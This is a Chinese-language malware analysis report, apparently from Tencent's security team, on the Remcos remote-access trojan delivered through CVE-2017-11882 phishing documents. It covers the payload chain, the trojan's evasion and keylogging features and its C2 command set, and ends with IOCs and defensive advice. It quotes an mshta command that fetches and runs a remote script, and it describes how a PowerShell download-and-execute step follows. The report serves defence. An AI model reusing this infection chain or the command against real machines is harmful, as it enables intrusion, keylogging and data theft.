0×1 概况
近期腾讯安全御见情报中心监测到利用CVE-2017-11882漏洞攻击的事件呈陡增趋势,在攻击洪流中,我们捕获到一款名为Remcos的远控木马通过鱼叉邮件进行传播。
Remcos木马是一款较新的远控木马,自2016年下半年开始在黑客论坛公开售卖,其后经过多次版本更新,功能日益强大。此前针对外贸行业的“商贸信”事件中,也曾出现该木马的身影。值得注意的是,同是利用公式编辑器漏洞,Remcos远控木马较之“商贸信”病毒,呈现出“急起直追”的趋势,在近期漏洞攻击事件中表现非常活跃。
(“Remcos”官网售价情况)
0×2 载荷投递
在未修复CVE-2017-11882漏洞的机器上,双击打开邮件附件中的恶意word文档,公式编辑器会利用mshta.exe执行远程脚本,命令行为“mshta https://d.pr/Wuod3I/d.pr &AAAAAAAAAAAAC”。
远程脚本中的代码经过了简单的混淆,经过还原后,可以看到关键代码。脚本的主要作用是利用powershell下载和执行new.exe 。
(还原后的关键代码)
0×3 RAT分析
下载到的木马new.exe为delphi语言编写,经过分析发现该delphi只是用来当壳的,从new.exe中可以dump真正的木马,即商业级的远控木马Remcos,主要功能有远程桌面、键盘键盘、下载和运行程序、文件和注册表等的各种操作,详细介绍请参考https://breaking-security.net/remcos-v1-9-7-released/。
(木马本尊的图标)
(商业级远控程序Remcos后台界面)
Remcos启动时会解密资源中的“SETTINGS”项,从而得到服务器ip、木马功能的各种配置项、互斥体名称等。解密后的“SETTINGS”项以“@@”为分隔符,被解析后存入一个数组,以数组的索引当作key,从而方便后续利用key找到相对应的value项。
(解密后的settings项,pass为网络发包时的默认加密key)
(用到的mutex名称Remcos开头)
(用到的注册表项Remcos开头)
(用到的mutex名称Remcos开头)
(检测sandbox)
(检测虚拟机)
(检测vbox)
(检测调试)
(可以通过配置项显示console来打印日志)
(开启键盘记录器功能)
(将记录的按键信息存储在%appdata\remcos目录下,文件名为logs.dat)
(发包时都以“[DataStart]”开头,加密后发送给c2)
(以“pass”来初始化加密table)
(加密算法第一部分,初始化加密table的函数)
(加密算法第二部分,利用加密table去加密)
协议body以”|cmd|”进行分割,分割后的第一个字符串为命令字,比如图中的“addnew”即为命令字。
(第一个包将计算名、用户名等信息发送给c2)
服务器下发的命令字主要有:
| 主命令字 | 功能 |
|---|---|
| ping | 心跳包 |
| keepaliveoff | 在console中打印了一行日志 |
| filemgr | 上传本地文件的信息或下载、执行文件 |
| downloadfromurl | 下载并打开文件 |
| downloadfromlocal | 直接执行指定的文件 |
| getproclist | 上报进程列表 |
| Prockill | 结束指定的进程 |
| getwindows | 上报窗口列表 |
| closewindow | 关闭窗口 |
| maxwindow | 最大化窗口 |
| restorewindow | 恢复窗口 |
| closeprocfromwindow | 结束带指定窗口的进程 |
| execcom | 利用WinExec执行文件 |
| consolecmd | 执行cmd命令 |
| openaddress | ShellExecuteW open |
| initializescrcap | 初始化屏幕截图 |
| freescrcap | 释放屏幕截图时的相关资源 |
| initklfrm | 初始化键盘记录 |
| startonlinekl | 开启实时键盘记录 |
| stoponlinekl | 停止实时键盘记录 |
| getofflinelogs | 上传离线模式下记录的按键信息 |
| autogetofflinelogs | 自动获取离线下的按键信息 |
| deletekeylog | 删除键盘记录的文件 |
| clearlogins | 清除cookies及login信息 |
| getscrslist | 上报文件列表信息 |
| dwnldscr | 上报存储在本地截图信息 |
| initcamcap | 初始化远程桌面时的socket等资源 |
| freecamcap | 释放远程桌面时的资源 |
| miccapture | 获取播放的声音的信息 |
| stopmiccapture | 停止监控声音设备 |
| initpwgrab | |
| deletefile | 删除文件 |
| close | 结束某进程 |
| uninstall | 删除木马安装时的相关信息 |
| updatefromurl | 从网上下载并更新木马文件 |
| updatefromlocal | 利用已下载好的文件更新木马文件 |
| msgbox | 弹框 |
| keyinput | 模拟按键 |
| mclick | 点击鼠标 |
| OSpower | 操作电源按钮 |
| getclipboard | 获取剪贴板中的信息 |
| setclipboard | 设置剪贴板中的数据 |
| emptyclipboard | 清空剪贴板 |
| dlldata | 将dll映射进内存 |
| dllurl | 将下载的dll映射进内存 |
| initregedit | 注册表相关的操作 |
| initchat | 初始化聊天相关的功能 |
| renamebck | 改注册表中的name项 |
| initsocks | 初始化socket |
0×4 安全建议
CVE-2017-11882公式编辑器漏洞补丁发布已近半年,攻击者仍亲睐使用此漏洞进行攻击,部分用户因未安装漏洞补丁导致木马入侵成功,在此提醒广大用户应及时使用腾讯电脑管家等安全软件更新系统补丁,以防御漏洞攻击,同时不要打开来历不明的邮件附件。
该木马功能强大、键盘记录、远程桌面、文件、注册表、进程等各种远控功能都有,同时利用了先进的自加载技术来躲避杀毒软件的检测,隐蔽性较高。企业用户可按以下方法进行自查或防范:
1. 该木马会在%appdata%目录下创建名为remcos的隐藏文件夹
2. 该木马会创建名为ros的开机自启动项
3. 根据下文的c2信息检测3440端口的网络连接情况或禁用此端口
腾讯御界高级威胁检测系统基于腾讯反病毒实验室的安全能力,依托腾讯在云和端的大数据,形成了强大且独特的威胁情报和恶意检测模型,凭借基于行为的防护和智能模型两大核心能力,能高效检测未知威胁,并实时阻拦钓鱼邮件、恶意宏文档等攻击方式。
附录(IOCs):
Md5:
6e421f7c63d9a894546d532d017c604a
48E27626AB41E8569405546360700546
7bfcf044fb11a252a71f0fd1753882ec
0a591617e781ff3722bc2fa716599eae
991F2506786A6B29D254B6D195C656D5
C2:
185.171.25.7
Urls:
关键目录:
%appdata%\ros
%appdata%\remcos